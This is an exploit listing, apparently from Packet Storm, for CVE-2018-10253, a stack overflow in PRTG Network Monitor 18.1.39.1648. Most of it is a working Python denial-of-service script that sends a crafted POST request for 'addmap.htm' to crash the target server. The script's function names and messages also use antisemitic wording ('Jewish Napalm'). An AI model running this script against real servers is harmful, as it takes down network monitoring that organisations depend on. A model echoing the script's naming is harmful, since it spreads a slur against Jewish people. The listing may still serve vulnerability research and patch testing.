PRTG 18.1.39.1648 Stack Overflow

PRTG version 18.1.39.1648 suffers from a stack overflow vulnerability.


MD5 | 639d9df68c0304f386b0ca1f4e57854b

Download
# Exploit Title: PRTG 18.1.39.1648 - Stack Overflow
# Date: 2018-04-21
# Exploit Author: Lucas "luriel" Carmo
# Vendor Homepage: https://www.paessler.com/prtg
# Software Link: https://www.paessler.com/download/prtg-download
# Version: 18.1.39.1648
# CVE : CVE-2018-10253
# Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5
# http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/
 
#!/usr/bin/python
 
import requests
import sys
import os
import re
import socket
 
green = "\033[1;32m"
yellow = '\033[1;33m'
normal = '\033[0;0m'
banner = """
     aaaaaaaaaaaaaa    aaaaaaaaaaaaaaaaa  aaa    aaaa   aaa aaaaaa aaaaaaa  aaaaaa aaa     aaaa   aaaa
     aaaaaaaaaaaaaa    aaaaaaaaaaaaaaaaa  aaa    aaaaa  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa     aaaaa aaaaa
     aaaaaaaaa  aaa aa aaaaaaaaaaaaaaaaaaaaaa    aaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa     aaaaaaaaaaa
aa   aaaaaaaaa  aaaaaaaaaaaaaaaaaaaaaaaaaaaaa    aaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa     aaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa  aaa    aaa aaaaaaaaa  aaaaaa     aaa  aaaaaaaaaaaaaa aaa aaa
 aaaaaa aaaaaaaa aaaaaaaa aaaaaaaaaaaaaa  aaa    aaa  aaaaaaaa  aaaaaa     aaa  aaaaaaaaaaaaaa     aaa
"""
 
 
banner2 = """
                                            Author: @Lucas "luriel" Carmo
"""
 
os.system('clear')
 
print(green+banner)
print(yellow+banner2)
print(normal)
 
def check_http(url):
    pattern = re.compile("http://")
    return re.search(pattern, url)
 
def sanitize_url(url):
    if(not check_http(url)):
        return "http://" + url
    return url
 
def check_server(url):
    r = requests.get(url, timeout=4)
    code = r.status_code
 
def send_jewish_payload(url):
    payload = {'file':'addmap.htm'}
    r = requests.post(url, params=payload)
 
def main():
    try:
        if len(sys.argv) <= 3 and len (sys.argv) >= 2:
            try:
                url = sanitize_url(sys.argv[1])
                print(' [#] LOADING!')
                if (check_server(url) != 404):
                    send_jewish_payload(url)
                else:
                    print(' [!] Server shutdown or not found')
            except requests.exceptions.ConnectionError:
                print(' [~] BOOOOOM! PRTG Server has been exploded!')
            except requests.exceptions.InvalidURL:
                print(' [!] Invalid URL')
            except requests.exceptions.Timeout:
                print(' [!] Connection Timeout\n')
        else:
            print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')
    except KeyboardInterrupt:
        print(' [!] Jewish Napalm Canceled;.....[./]')
if __name__ == '__main__':
    main()



Source: packetstormsecurity.com
Related Posts